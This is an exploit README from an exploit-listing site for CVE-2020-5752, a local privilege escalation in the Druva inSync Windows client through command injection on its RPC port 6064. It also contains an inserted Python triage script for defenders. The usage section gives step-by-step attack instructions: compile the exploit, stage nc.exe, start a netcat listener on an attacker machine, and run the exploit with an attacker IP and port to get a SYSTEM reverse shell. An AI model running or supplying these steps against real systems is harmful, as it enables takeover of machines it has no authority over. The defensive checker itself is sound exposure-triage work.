## https://sploitus.com/exploit?id=16EB0423-FAEF-5FD9-9652-100925696C25
# CVE-2020-5752: Druva inSync Local Privilege Escalation
A C-based exploit for the **Druva inSync Windows Client (v6.6.3 and below)**. The application exposes an RPC service on port 6064 that is vulnerable to command injection via path traversal. This allows a local user to execute arbitrary commands as `NT AUTHORITY\SYSTEM`.
## Vulnerability Details
- **CVE:** 2020-5752
- **Tested on:** Windows 10 (x64)
- **Privilege Level:** Local Privilege Escalation (LPE)
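
For defenders triaging exposure, the added example below (not part of the original exploit repository) checks the two conditions stated above: a client version of 6.6.3 or lower and a TCP listener on port 6064. The `netstat -ano` excerpt is constructed sample data, and the function names and result labels are assumptions made for illustration.

```python
import re

VULN_MAX = (6, 6, 3)   # from the page: "v6.6.3 and below"
RPC_PORT = 6064        # from the page: RPC service port

# Constructed `netstat -ano` excerpt; addresses and PIDs are made up.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    127.0.0.1:6064         0.0.0.0:0              LISTENING       3324
  TCP    10.0.0.23:49712        10.0.0.5:443           ESTABLISHED     5120
"""

def parse_version(text):
    """Return the first three numeric components of a dotted version."""
    m = re.match(r"\s*(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"not a version string: {text!r}")
    parts = [int(p) for p in m.group(1).split(".")][:3]
    return tuple(parts + [0] * (3 - len(parts)))

def is_vulnerable_version(text):
    # Numeric tuple comparison, so 6.10.0 is correctly newer than 6.6.3.
    return parse_version(text) <= VULN_MAX

def listeners_on_port(netstat_text, port=RPC_PORT):
    """Return (local_address, pid) for each TCP socket listening on port."""
    found = []
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) != 5 or f[0] != "TCP" or f[3] != "LISTENING":
            continue
        addr, _, local_port = f[1].rpartition(":")
        if local_port == str(port):
            found.append((addr, int(f[4])))
    return found

def triage(version_text, netstat_text):
    """Classify a host from its client version and netstat output."""
    if not is_vulnerable_version(version_text):
        return "not-affected-version"
    if listeners_on_port(netstat_text):
        return "vulnerable-and-listening"
    return "vulnerable-version-service-down"

if __name__ == "__main__":
    print(triage("6.6.3", SAMPLE_NETSTAT), listeners_on_port(SAMPLE_NETSTAT))
```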
## Usage
### 1. Compilation
Use `gcc` (MinGW) to compile the source code:
```bash
gcc exploit.c -o exploit.exe -lws2_32
```
### 2. Preparation
Place a copy of `nc.exe` in a directory accessible by the SYSTEM account (e.g., `C:\Windows\Tasks\`).
### 3. Execution
Start a listener on your attacker machine:
```bash
nc -lvnp 4444
```
Run the exploit on the target Windows machine:
```dos
exploit.exe
```
Example:
```dos
exploit.exe 10.10.10.5 4444 C:\Windows\Tasks\nc.exe
```
### Disclaimer
This tool is for educational purposes only. Unauthorized use on systems you do not have permission to test is illegal.